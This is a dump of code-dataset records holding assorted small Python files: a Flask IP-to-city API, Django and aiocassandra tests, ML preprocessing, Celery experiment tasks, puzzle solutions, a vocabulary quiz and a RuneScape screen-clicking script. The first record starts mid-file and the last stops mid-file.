self.get_param('value_type')\n value_key = self.get_param('value_key')\n identity = self.get_param('identity')\n ele = self.get_element_by(chrome, collectby, identity)\n\n valueCollected = ''\n\n if value_type == 'text':\n valueCollected = ele.text\n\n if value_type == 'value':\n valueCollected = ele.get_property('value')\n\n if value_type == 'any':\n valueCollected = self.getValue(ele)\n\n self.populate_data(value_key, valueCollected)\n\n def getValue(self, ele):\n try:\n return ele.text\n except:\n return ele.get_attribute('value')\n","sub_path":"core/processors/FIND_THEN_COLLECTProcessor.py","file_name":"FIND_THEN_COLLECTProcessor.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"89864092","text":"import datetime as dt\nfrom flask import Flask, jsonify, request\nfrom ipaddress import ip_network, ip_address\nimport netaddr\n\nclass UserStatusSearch:\n RECORDS = [\n {'user_id': 1, 'created_at': '2017-01-01T10:00:00', 'status': 'paying'},\n {'user_id': 1, 'created_at': '2017-03-01T19:00:00', 'status': 'paying'},\n {'user_id': 1, 'created_at': '2017-02-01T12:00:00', 'status': 'cancelled'},\n {'user_id': 3, 'created_at': '2017-10-01T10:00:00', 'status': 'paying'},\n {'user_id': 3, 'created_at': '2016-02-01T05:00:00', 'status': 'cancelled'},\n {'user_id': 3, 'created_at': '2017-10-03T12:52:33', 'status': 'paying'},\n ]\n\n def __init__(self):\n self.treeMap = {}\n for record in UserStatusSearch.RECORDS:\n if record['user_id'] not in self.treeMap:\n self.treeMap[record['user_id']] = {}\n self.treeMap[record['user_id']][record['created_at']] = record['status']\n\n def get_status(self, user_id, date):\n try:\n value = self.treeMap[user_id][date.strftime('%Y-%m-%dT%H:%M:%S')]\n return value\n except:\n return 'non-paying'\n\nclass IpRangeSearch:\n RANGES = {\n 'london': [\n {'start': '10.10.0.0', 'end': '10.10.255.255'},\n {'start': '192.168.1.0', 'end': '192.168.1.255'},\n ],\n 'munich': [\n {'start': '10.12.0.0', 'end': '10.12.255.255'},\n {'start': '172.16.10.0', 'end': '172.16.11.255'},\n {'start': '192.168.2.0', 'end': '192.168.2.255'},\n ]\n }\n\n def __init__(self):\n # self.sorted_cidrs = []\n self.cidrs = []\n for key, value in IpRangeSearch.RANGES.items():\n for val in value:\n cidr = netaddr.iprange_to_cidrs(val['start'], val['end'])\n net = ip_network(str(cidr[0]))\n self.cidrs.append((key, net))\n\n def get_city(self, ip):\n for cidr_tuple in self.cidrs:\n if (ip_address(ip) in cidr_tuple[1]):\n return cidr_tuple[0]\n return 'unknown'\n\n\napp = Flask(__name__)\nuser_status_search = UserStatusSearch()\nip_range_search = IpRangeSearch()\n\n\n@app.route('/user_status/')\ndef user_status(user_id):\n \"\"\"\n Return user status for a given date\n\n /user_status/1?date=2017-10-10T10:00:00\n \"\"\"\n date = dt.datetime.strptime(str(request.args.get('date')), '%Y-%m-%dT%H:%M:%S')\n\n return jsonify({'user_status': user_status_search.get_status(int(user_id), date)})\n\n\n@app.route('/ip_city/')\ndef ip_city(ip):\n \"\"\"\n Return city for a given ip\n\n /ip_city/10.0.0.0\n \"\"\"\n return jsonify({'city': ip_range_search.get_city(ip)})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598795071","text":"import pytest\nfrom local.api.models import Genre\n\n\n@pytest.mark.django_db\ndef test_genre_name_max_length_set():\n genre = Genre.objects.create(name=\"thriller\")\n\n max_length = genre._meta.get_field('name').max_length\n\n assert max_length == 200\n\n@pytest.mark.django_db\ndef test_genre_name_str():\n genre = Genre.objects.create(name=\"thriller\")\n\n s = genre.__str__()\n\n assert s == \"thriller\"\n\n\n","sub_path":"tests/local/api/models/test_genre.py","file_name":"test_genre.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56560140","text":"import os, sys, json, re\n\nclass Handler:\n name=None\n patterns = [\n r'^(ls|list)$',\n r'^(ls|list) (networks|machines|targets)$',\n r'^(ls|list) (active|local|repo) (networks|machines|targets)$'\n ]\n\n def __init__(self, config, session):\n self.config = config\n self.session = session\n self.compiled = [re.compile(p) for p in self.patterns]\n self.default_ls = 'local'\n \n def help(self):\n print(\"ls command\")\n print(\"----------\")\n print(\"\\n Usage: list|ls (active|local|repo) \")\n print(\"\\n Example: `ls machines` - lists all local machines\")\n print(\" `ls active networks` - lists all active networks\") \n\n def matches(self, text):\n for p in self.compiled:\n match = p.match(text)\n if(match is not None):\n return match\n return None\n\n def run(self, match, session, config):\n args = self.default_ls\n cmd = None\n if(len(match.groups()) == 3):\n args = match.group(1) \n cmd = match.group(2)\n elif(len(match.groups()) == 1):\n return self.help() \n elif(len(match.groups()) == 2):\n cmd = match.group(2)\n else:\n return \n if(cmd == 'machines'):\n ListMachines(config, session, args, self)\n elif(cmd == 'networks'):\n ListNetworks(config, session, args, self)\n elif(cmd == 'targets'):\n ListTargets(config, session, args, self) \n else:\n pass\n\n\nclass ListTargets:\n name= 'list_targets'\n\n def __init__(self, config, session, args, parent):\n self.config = config\n self.session = session\n self.parent = parent\n self.run()\n\n\n def run(self):\n for idx, machine in enumerate(self.session.targets):\n status = ''\n if(machine is not None and machine.status == 'running'):\n status = \"\"%(machine.vpn_client.ip)\n print(\" [%d] %s\\t%s\\t\\t%s\"%(idx, machine.id, machine.name, status))\n pass \n\n\nclass ListNetworks:\n name= 'list_networks'\n\n def __init__(self, config, session, args, parent):\n self.config = config\n self.session = session\n self.parent = parent\n self.run()\n\n\n def run(self):\n for idx, machine in enumerate(self.session.networks()):\n status = ''\n if(machine is not None and machine.status == 'running'):\n status = \"\"%(machine.vpn_client.ip)\n print(\" [%d] %s\\t%s\\t\\t%s\"%(idx+1, machine.id, machine.name, status))\n pass \n\nclass ListMachines:\n name= 'list_machines'\n\n def __init__(self, config, session, args, parent):\n self.config = config\n self.session = session\n self.parent = parent\n self.run()\n\n def run(self):\n for idx, machine in enumerate(self.session.machines()):\n status = ''\n if(machine is not None and machine.status == 'running'):\n status = \"\"%(machine.vpn_client.ip)\n print(\" [%d] %s\\t%s\\t\\t%s\"%(idx+1, machine.id, machine.name, status))\n pass \n","sub_path":"command/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3136255","text":"import os\nfrom datetime import datetime\n\nimport git\n\n\ndef load_directories(path):\n file_name = os.listdir(path)\n file_path = []\n for i in file_name:\n extension = i.split('.')[-1]\n if extension in 'png':\n file_path.append(path + '/' + i)\n file_path.sort()\n return file_path\n\n\ndef create_dir(path):\n if not os.path.isdir(path):\n os.makedirs(path)\n\n\ndef get_root_dir():\n repo = git.Repo(search_parent_directories=True)\n sha = repo.head.object.hexsha\n commit_hash = repo.git.rev_parse(sha)\n now = datetime.now().strftime('%Y%m%d%H%M%S')\n return 'output_lv1/' + commit_hash + '_' + now\n","sub_path":"lv1_src/path_manage.py","file_name":"path_manage.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"630977026","text":"import os\nimport random\n\n\ndef path_file():\n work_path = '/Users/evgeny/Project/specialist/python_1/day_3/'\n file_name = 'en-ru.txt'\n return os.path.join(work_path, file_name)\n\n\ndef write_file(en, ru):\n text = f'{en}:{ru}\\n'\n file = open(path_file(), 'a')\n file.write(text)\n\n\ndef revers_dict(lang='en'):\n dict_word = {}\n try:\n file = open(path_file(), 'r')\n except FileNotFoundError as fnf:\n print(f'Файл {path_file()} не найден')\n\n if lang == 'en':\n for i in file:\n list_word = i.split(':')\n dict_word.update({list_word[0]:list_word[1].strip()})\n return dict_word\n elif lang == 'ru':\n for i in file:\n list_word = i.split(':')\n dict_word.update({list_word[1].strip():list_word[0]})\n return dict_word\n\n\ndef find_word(word, lang='en'):\n dict_word = {}\n try:\n file = open(path_file(), 'r')\n except FileNotFoundError as fnf:\n print(f'Файл {path_file()} не найден')\n\n if lang == 'en':\n dict_word = revers_dict('en')\n return dict_word.get(word)\n elif lang == 'ru':\n dict_word = revers_dict('ru')\n return dict_word.get(word)\n\n\ndef lang_test(lang):\n wrong = 0\n attempt = 0\n dict_word = {}\n wrong_answer = {0:' Супер, у тебя 5 правильных ответов из 5',\n 1:' Отлично, у тебя 1 неправильный ответ из 5',\n 2:' Хорошо, у тебя 2 неправильный ответа из 5',\n 3:' Плохо, у тебя 3 неправильный ответа из 5',\n 4:' Ужастно, у тебя 4 неправильный ответа из 5',\n 5:' Ты вообще учил?'}\n\n if lang == 'en':\n dict_word = revers_dict('en')\n elif lang == 'ru':\n dict_word = revers_dict('ru')\n\n while attempt != 5:\n question_id = random.choice(list(dict_word.keys()))\n correct_answer = dict_word.get(question_id)\n answer = input(f'Как переводится {question_id} ?: ')\n attempt = attempt + 1\n if answer == correct_answer:\n print(f'Правильно, {correct_answer}')\n elif answer != correct_answer:\n wrong = wrong + 1\n print(f'{answer} Не правильно, будет {correct_answer}')\n print(wrong_answer.get(wrong))\n\n\ndef main():\n while True:\n action = input('Пополнить, Найти или пройти Тест?: ')\n if action.lower() == 'пополнить':\n en = input(' Введите слово на английском: ')\n ru = input(' Введите слово на русском: ')\n write_file(en,ru)\n print(f' Добавлено сочетание {en} - {ru}')\n elif action.lower() == 'найти':\n lang = input(' Какой язык (en или ru): ')\n word = input(' Введите искомое слово: ')\n\n print(f'\"{word}\" в переводе будет:' \n if find_word(word, lang) is not None \n else f' \"{word}\" Ненайдено')\n elif action.lower() == 'тест':\n lang = input(' Какой язык (en или ru): ')\n lang_test(lang)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_1/day_3/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468954991","text":"import threading\nfrom random import randint\nfrom time import sleep\nimport pycurl\nimport json\n\ntry:\n from io import BytesIO\nexcept ImportError:\n from StringIO import StringIO as BytesIO\n\nresult = []\ndef my_function(URL):\n buffer = BytesIO()\n c = pycurl.Curl()\n c.setopt(pycurl.ENCODING, 'gzip, deflate')\n c.setopt(pycurl.CONNECTTIMEOUT, 30)\n c.setopt(pycurl.TIMEOUT, 30)\n c.setopt(c.URL, URL)\n c.setopt(c.WRITEDATA, buffer)\n c.setopt(c.FOLLOWLOCATION, 10)\n c.perform()\n return result.append(c.getinfo(c.TOTAL_TIME))\n\n\nurls = [\n 'http://www.python.org', \n 'http://www.python.org/about/',\n 'http://www.python.org/doc/',\n 'http://www.python.org/download/',\n 'http://www.python.org/getit/',\n 'http://www.python.org/community/',\n 'https://wiki.python.org/moin/',\n]\n\nthread_list = []\n\nfor i in urls:\n # Instantiates the thread\n # (i) does not make a sequence, so (i,)\n t = threading.Thread(target=my_function, args=(i,))\n # Sticks the thread in a list so that it remains accessible\n thread_list.append(t)\n\n# Starts threads\nfor thread in thread_list:\n thread.start()\n\n# This blocks the calling thread until the thread whose join() method is called is terminated.\n# From http://docs.python.org/2/library/threading.html#thread-objects\nfor thread in thread_list:\n thread.join()\n\n# Demonstrates that the main process waited for threads to complete\nprint(sum(result))\n","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330279933","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os # noqa # isort:skip\nimport sys # noqa # isort:skip\nimport unittest # noqa # isort:skip\n\nos.environ['PYTHONASYNCIODEBUG'] = '1' # noqa # isort:skip\n\nfrom aiocassandra import aiosession # noqa # isort:skip\nfrom cassandra.cluster import Cluster # noqa # isort:skip\n\n\nif sys.version_info >= (3, 3):\n import asyncio\n from tests_asyncio import AiosessionTestCase\nelse:\n import trollius as asyncio\n from tests_trollius import AiosessionTestCase\n\n\nclass AiocassandraTestCase(AiosessionTestCase):\n def test_malformed_session(self):\n with self.assertRaises(AssertionError):\n aiosession(None)\n\n def test_patched_twice(self):\n with self.assertRaises(RuntimeError):\n aiosession(self.session, loop=self.loop)\n\n def test_main_thread_loop_missing(self):\n with self.assertRaises(RuntimeError):\n try:\n cluster = Cluster()\n\n session = cluster.connect()\n\n aiosession(session)\n finally:\n cluster.shutdown()\n\n def test_main_thread_loop(self):\n try:\n loop = asyncio.new_event_loop()\n loop.set_debug(True)\n asyncio.set_event_loop(loop)\n\n cluster = Cluster()\n session = cluster.connect()\n\n aiosession(session)\n\n self.assertIs(loop, session._loop)\n finally:\n cluster.shutdown()\n loop.call_soon(loop.stop)\n loop.run_forever()\n loop.close()\n\n def test_explicit_loop(self):\n self.assertIs(self.loop, self.session._loop)\n\n def test_session_patched(self):\n self.assertIsNotNone(getattr(self.session, 'execute_future', None))\n\n def tearDown(self):\n self.cluster.shutdown()\n self.loop.call_soon(self.loop.stop)\n self.loop.run_forever()\n self.loop.close()\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(AiocassandraTestCase)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266090620","text":"\nimport hgtk\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\nfrom utils import *\nfrom config import *\n\n\ndef eng_preprop(in_str):\n in_str = in_str.lower()\n in_str = in_str.replace(' ', '_')\n in_str = in_str.replace('-', '_')\n return in_str\n\ndef kor_preprop(in_str):\n in_str = in_str.replace(' ', '')\n in_str_decompose = hgtk.text.decompose(in_str)\n in_str_filter = [x for x in list(in_str_decompose) if x != DEFAULT_COMPOSE_CODE]\n in_str_join = ''.join(in_str_filter)\n return in_str_join\n\ndef preprocessing(data):\n# log('> Preprocessing')\n for i, _ in enumerate(data):\n source_eng = data[i].split('\\t')[0]\n target_kor = data[i].split('\\t')[-1]\n data[i] = eng_preprop(source_eng) + '\\t' + kor_preprop(target_kor)\n return data\n\ndef input_formatting(data):\n# log('> Input Formatting')\n input_texts = [] # sentence in original language\n target_texts = [] # sentence in target language\n target_texts_inputs = [] # sentence in target language offset by 1\n \"\"\"\n < korean-go.txt >\n ... ... ...\n gahnite 가나이트\n garnetting 가네팅\n GANEFO 가네포\n garnett 가넷\n ... ... ...\n \"\"\"\n #t = 0\n #for line in open(os.getcwd() + '/spa.txt'):\n for line in data:\n # only keep a limited number of samples\n #t += 1\n #if t > NUM_SAMPLES:\n # break\n # input and target are separated by tab\n if '\\t' not in line:\n continue\n # split up the input and translation\n input_text, translation = line.rstrip().split('\\t')\n\n # make the target input and output\n # recall we'll be using teacher forcing\n target_text = ' '.join(list(translation)) + ' '\n target_text_input = ' ' + ' '.join(list(translation))\n\n input_texts.append(' '.join(list(input_text)))\n target_texts.append(target_text)\n target_texts_inputs.append(target_text_input)\n\n params['LEN_INPUT_TEXTS'] = len(input_texts)\n return (input_texts, target_texts_inputs, target_texts)\n\ndef tokenizing(input_texts, target_texts_inputs, target_texts, rsrc_path):\n# log('> Tokenizing')\n ## tokenize the inputs\n #tokenizer_inputs = Tokenizer(num_words=MAX_NUM_WORDS)\n tokenizer_inputs = Tokenizer(num_words=params['MAX_NUM_WORDS'], filters='') # MAX_NUM_WORDS = None\n tokenizer_inputs.fit_on_texts(input_texts)\n input_sequences = tokenizer_inputs.texts_to_sequences(input_texts)\n # get the word to index mapping for input language\n word2idx_inputs = tokenizer_inputs.word_index\n params['LEN_WORD2IDX_INPUTS'] = len(word2idx_inputs)\n #print('Found %s unique input tokens.' % len(word2idx_inputs))\n # determine maximum length input sequence\n params['MAX_LEN_INPUT'] = max(len(s) for s in input_sequences)\n # save 'tokenizer_inputs' for decoding\n save_pkl(tokenizer_inputs, rsrc_path + '/'+ 'tokenizer_inputs.pkl')\n# log('>> Tokenizer_inputs is saved!')\n\n ## tokenize the outputs\n # tokenize the outputs\n # don't filter out special characters\n # otherwise and won't appear\n tokenizer_outputs = Tokenizer(num_words=params['MAX_NUM_WORDS'], filters='') # MAX_NUM_WORDS = None\n tokenizer_outputs.fit_on_texts(target_texts + target_texts_inputs) # inefficient, oh well\n target_sequences = tokenizer_outputs.texts_to_sequences(target_texts)\n target_sequences_inputs = tokenizer_outputs.texts_to_sequences(target_texts_inputs)\n # get the word to index mapping for output language\n word2idx_outputs = tokenizer_outputs.word_index\n params['LEN_WORD2IDX_OUTPUTS'] = len(word2idx_outputs)\n #print('Found %s unique output tokens.' % len(word2idx_outputs))\n # store number of output words for later\n # remember to add 1 since indexing starts at 1 (index 0 = unknown)\n #num_words_output = len(word2idx_outputs) + 1\n # determine maximum length output sequence\n params['MAX_LEN_TARGET'] = max(len(s) for s in target_sequences) \n # save 'tokenizer_inputs' for decoding\n save_pkl(tokenizer_outputs, rsrc_path + '/' + 'tokenizer_outputs.pkl')\n# log('>> Tokenizer_outputs is saved!')\n\n return (input_sequences, target_sequences_inputs, target_sequences, word2idx_inputs, word2idx_outputs)\n\ndef padding(input_sequences, target_sequences_inputs, target_sequences):\n# log('> Padding')\n # pad the sequences\n encoder_inputs = pad_sequences(input_sequences, maxlen=params['MAX_LEN_INPUT'])\n# log(\">> encoder_data.shape:\", encoder_inputs.shape)\n #print(\"encoder_data[0]:\", encoder_inputs[0])\n\n decoder_inputs = pad_sequences(target_sequences_inputs, maxlen=params['MAX_LEN_TARGET'], padding='post')\n #print(\"decoder_data[0]:\", decoder_inputs[0])\n# log(\">> decoder_data.shape:\", decoder_inputs.shape)\n\n decoder_targets = pad_sequences(target_sequences, maxlen=params['MAX_LEN_TARGET'], padding='post')\n\n return (encoder_inputs, decoder_inputs, decoder_targets)\n","sub_path":"engkor_transliterator/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220566827","text":"#!/usr/bin/env python3.7\nimport sys\nimport argparse\n\nimport yaml\nfrom PIL import Image\nfrom pyocr import pyocr\nfrom pyocr import builders\n\n\nwith open(\"../config.yaml\", \"r\") as f:\n config = yaml.safe_load(f)\n\ntools = pyocr.get_available_tools()\ntool = tools[0]\n\ndef ocr_img(img, loc, debug=None):\n image=Image.open(img)\n crop=image.crop(loc)\n if debug != None:\n crop.show()\n print(tool.image_to_string(crop).replace(\"\\n\", \" \"))\n\n# usage '__name__' --loc location --app app1|app2 image\n\ndef main():\n parser = argparse.ArgumentParser(description='Pokemon GO image tester')\n parser.add_argument('--loc', type=str, default=None,\n help=\"Crop location from config file\")\n parser.add_argument('--app', default='app1', type=str,\n help='App to capture: app1|app2')\n parser.add_argument('--debug', help='Debug level, default None', default=None)\n parser.add_argument('imagefile', help='Image file to parse')\n args = parser.parse_args()\n\n debuglvl=args.debug\n\n if args.loc == None:\n print('location needed. Exiting')\n sys.exit(0)\n\n print('location: {}'.format(str(config[args.app]['locations'][args.loc])))\n\n print('Checking {} on {}'.format(args.loc, args.app))\n ocr_img(args.imagefile, config[args.app]['locations'][args.loc], debug=debuglvl)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tools/check_loc.py","file_name":"check_loc.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616099719","text":"import logging\n\nimport random\n\nfrom polyaxon_schemas.utils import SEARCH_METHODS\n\nfrom experiments.models import Experiment\nfrom experiments.tasks import build_experiment, stop_experiment\nfrom experiment_groups.models import ExperimentGroup\nfrom polyaxon.settings import CeleryTasks, Intervals\nfrom polyaxon.celery_api import app as celery_app\nfrom spawners.utils.constants import ExperimentLifeCycle\n\nlogger = logging.getLogger('polyaxon.tasks.experiment_groups')\n\n\ndef _get_group_ro_retry(experiment_group_id, task):\n try:\n return ExperimentGroup.objects.get(id=experiment_group_id)\n except ExperimentGroup.DoesNotExist:\n logger.info('ExperimentGroup `{}` was not found.'.format(experiment_group_id))\n if task.request.retries < 2:\n logger.info('Trying again for ExperimentGroup `{}`.'.format(experiment_group_id))\n task.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n logger.info('Something went wrong, '\n 'the ExperimentGroup `{}` does not exist anymore.'.format(experiment_group_id))\n return None\n\n\n@celery_app.task(name=CeleryTasks.EXPERIMENTS_GROUP_CREATE, bind=True, max_retries=None)\ndef create_group_experiments(self, experiment_group_id):\n experiment_group = _get_group_ro_retry(experiment_group_id=experiment_group_id, task=self)\n if not experiment_group:\n return\n\n # Parse polyaxonfile content and create the experiments\n specification = experiment_group.specification\n # We create a list of indices that we will explore\n if SEARCH_METHODS.is_sequential(specification.search_method):\n indices = range(specification.n_experiments or specification.matrix_space)\n elif SEARCH_METHODS.is_random(specification.search_method):\n sub_space = specification.n_experiments or specification.matrix_space\n indices = random.sample(range(specification.matrix_space), sub_space)\n else:\n logger.warning('Search method was not found `{}`'.format(specification.search_method))\n return\n for xp in indices:\n Experiment.objects.create(project=experiment_group.project,\n user=experiment_group.user,\n experiment_group=experiment_group,\n config=specification.parsed_data[xp])\n\n start_group_experiments.apply_async((experiment_group.id,), countdown=1)\n\n\n@celery_app.task(name=CeleryTasks.EXPERIMENTS_GROUP_START, bind=True, max_retries=None)\ndef start_group_experiments(self, experiment_group_id):\n experiment_group = _get_group_ro_retry(experiment_group_id=experiment_group_id, task=self)\n if not experiment_group:\n return\n\n # Check for early stopping before starting new experiments from this group\n if experiment_group.should_stop_early():\n stop_group_experiments(experiment_group_id=experiment_group_id,\n pending=True,\n message='Early stopping')\n return\n\n experiment_to_start = experiment_group.n_experiments_to_start\n pending_experiments = experiment_group.pending_experiments[:experiment_to_start]\n n_pending_experiment = experiment_group.pending_experiments.count()\n\n for experiment in pending_experiments:\n build_experiment.delay(experiment_id=experiment.id)\n\n if n_pending_experiment - experiment_to_start > 0:\n # Schedule another task\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=CeleryTasks.EXPERIMENTS_GROUP_STOP_EXPERIMENTS)\ndef stop_group_experiments(experiment_group_id, pending, message=None):\n try:\n experiment_group = ExperimentGroup.objects.get(id=experiment_group_id)\n except ExperimentGroup.DoesNotExist:\n logger.info('ExperimentGroup `{}` was not found.'.format(experiment_group_id))\n return\n\n if pending:\n for experiment in experiment_group.pending_experiments:\n # Update experiment status to show that its stopped\n experiment.set_status(status=ExperimentLifeCycle.STOPPED, message=message)\n else:\n for experiment in experiment_group.experiments.exclude(\n experiment_status__status__in=ExperimentLifeCycle.DONE_STATUS).distinct():\n if experiment.is_running:\n stop_experiment.delay(experiment_id=experiment.id)\n else:\n # Update experiment status to show that its stopped\n experiment.set_status(status=ExperimentLifeCycle.STOPPED, message=message)\n","sub_path":"polyaxon/experiment_groups/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248370218","text":"import pandas as pd\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\n\r\nfile_address = sys.argv[1]\r\n\r\ndf = pd.read_csv(file_address)\r\ndf['val_acc'].plot()\r\ndf['acc'].plot()\r\nplt.title('Accuracy Curve')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('Rate(%)')\r\nplt.legend()\r\nplt.show()\r\n\r\ndf['val_loss'].plot()\r\ndf['loss'].plot()\r\nplt.title('Loss Curve')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('value')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n","sub_path":"hw6/draw_a_picture.py","file_name":"draw_a_picture.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151017747","text":"########\n#Solved#\n########\n\n#The sum of the squares of the first ten natural numbers is,\n#12 + 22 + ... + 102 = 385The square of the sum of the first ten natural numbers is,\n#(1 + 2 + ... + 10)2 = 552 = 3025Hence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is 3025  385 = 2640.\n#Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.\n\ninit = 1\nend = 100\nsum1 = 0\nsum2 = 0\n\nfor f in range(int(init),int(end + 1)):\n sum1 = f * f + sum1\n sum2 = f + sum2\n\nprint(sum2 * sum2 - sum1)\n","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149937217","text":"from Baseline import Baseline\nfrom ScreenMatcher import ScreenMatcher\nfrom MatchCleaner import MatchCleaner\nfrom Clicker import Clicker\n\nmc_string = None;\nbase = Baseline();\nsm = ScreenMatcher(\"templates/interface/lunar_book.png\");\nmc = MatchCleaner(sm.getPositions());\ncl = Clicker(chance=100);\n\ncl.LC(mc.getCenters()[0], 0.5);\nbase.compass();\n\n\nsm.setTemplate(\"templates/interface/spin_flax.png\");\nmc.setRawPos(sm.getPositions());\nfor i in range(5):\n\t\tcl.LC(mc.getCenters()[0], 3);\n\nwhile True:\n\tsm.setTemplate(\"templates/world/edge_bank.png\");\n\tsm.setThresh(0.7);\n\tmc.setRawPos(sm.getPositions())\n\tcl.LC(mc.getCenters()[0], 0.5);\n\n\t\n\tif mc_string == None:\n\t\tsm.setTemplate(\"templates/items/bow_string.png\");\n\t\tmc_string = MatchCleaner(sm.getPositions());\n\tcl.RC(mc_string.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/interface/all.png\");\n\tmc.setRawPos(sm.getPositions())\n\tcl.LC(mc.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/items/flax.png\");\n\tmc.setRawPos(sm.getPositions());\n\tcl.RC(mc.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/interface/all.png\");\n\tmc.setRawPos(sm.getPositions());\n\tcl.LC(mc.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/interface/close_bank.png\");\n\tmc.setRawPos(sm.getPositions());\n\tcl.LC(mc.getCenters()[0], 0.1);\n\n\tsm.setTemplate(\"templates/interface/spin_flax.png\");\n\tmc.setRawPos(sm.getPositions());\n\tfor i in range(5):\n\t\tcl.LC(mc.getCenters()[0], 3);\n\n\n\t\n\n\t\n\n\t\n\n\t\n\t\n\t\n\t\n","sub_path":"gui_bot_builder/OldSchoolRunescapeBots/OldSchoolRunescapeBots/Flaxbot.py","file_name":"Flaxbot.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120580611","text":"##############################\n# #\n# Instructions #\n# #\n##############################\n\n# To run, use the following command:\n# $ python therealsue.py \n# where is the filename with the question's input\n\nimport sys\nimport re\n\n# Check to make sure correct number of arguments supplied\nif (len(sys.argv) != 2):\n print('Invalid number of arguments!')\n sys.exit()\n\n# Read the input from the file provided as argument\ninput_file = open(sys.argv[1])\npuzzle_input = input_file.readlines()\ninput_file.close()\n\n# Array indices\nchildren = 0\ncats = 1\nsamoyeds = 2\npomeranians = 3\nakitas = 4\nvizslas = 5\ngoldfish = 6\ntrees = 7\ncars = 8\nperfumes = 9\n\n# Properties which the aunt must have more than, less than, or exactly the right amount\ngreater_than_properties = [cats, trees]\nless_than_properties = [pomeranians, goldfish]\nequal_properties = [children, samoyeds, akitas, vizslas, cars, perfumes]\n\n# The target properties of the real aunt\naunt_properties = [3, 7, 2, 3, 0, 0, 5, 3, 2, 1]\n\n# Regexes to find the properties of each aunt remembered\naunt_regexes = [r'children: (\\d+)', r'cats: (\\d+)', r'samoyeds: (\\d+)', r'pomeranians: (\\d+)', r'akitas: (\\d+)', r'vizslas: (\\d+)', r'goldfish: (\\d+)', r'trees: (\\d+)', r'cars: (\\d+)', r'perfumes: (\\d+)']\n\n# The list of aunts so far\naunts = []\n\n# For each aunt in the input\nfor line in puzzle_input:\n\t# Start with -1 for all the values\n\taunt = [-1 for i in range(10)]\n\n\t# For each property, check if it was remembered about the aunt and, if so, update the list\n\tfor i in range(len(aunt_regexes)):\n\t\tmatch = re.search(aunt_regexes[i], line)\n\t\tif match:\n\t\t\taunt[i] = int(match.group(1))\n\n\t# Add the new aunt to the list so far\n\taunts.append(aunt)\n\n# Loop through all the aunts and find the one who matches all the properties\n# When they are found, print out their number\nfor aunt in range(len(aunts)):\n\tthe_real_aunt = True\n\tfor i in greater_than_properties:\n\t\tif not (aunts[aunt][i] > aunt_properties[i] or aunts[aunt][i] == -1):\n\t\t\tthe_real_aunt = False\n\tfor i in less_than_properties:\n\t\tif not (aunts[aunt][i] < aunt_properties[i] or aunts[aunt][i] == -1):\n\t\t\tthe_real_aunt = False\n\tfor i in equal_properties:\n\t\tif not (aunts[aunt][i] == aunt_properties[i] or aunts[aunt][i] == -1):\n\t\t\tthe_real_aunt = False\n\tif the_real_aunt:\n\t\tprint ('The aunt who sent the gift was Aunt Sue #', aunt + 1)\n","sub_path":"day_16/therealsue.py","file_name":"therealsue.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"16099917","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Site : \n# @File : name_parser.py\n\n\ndef inputer():\n 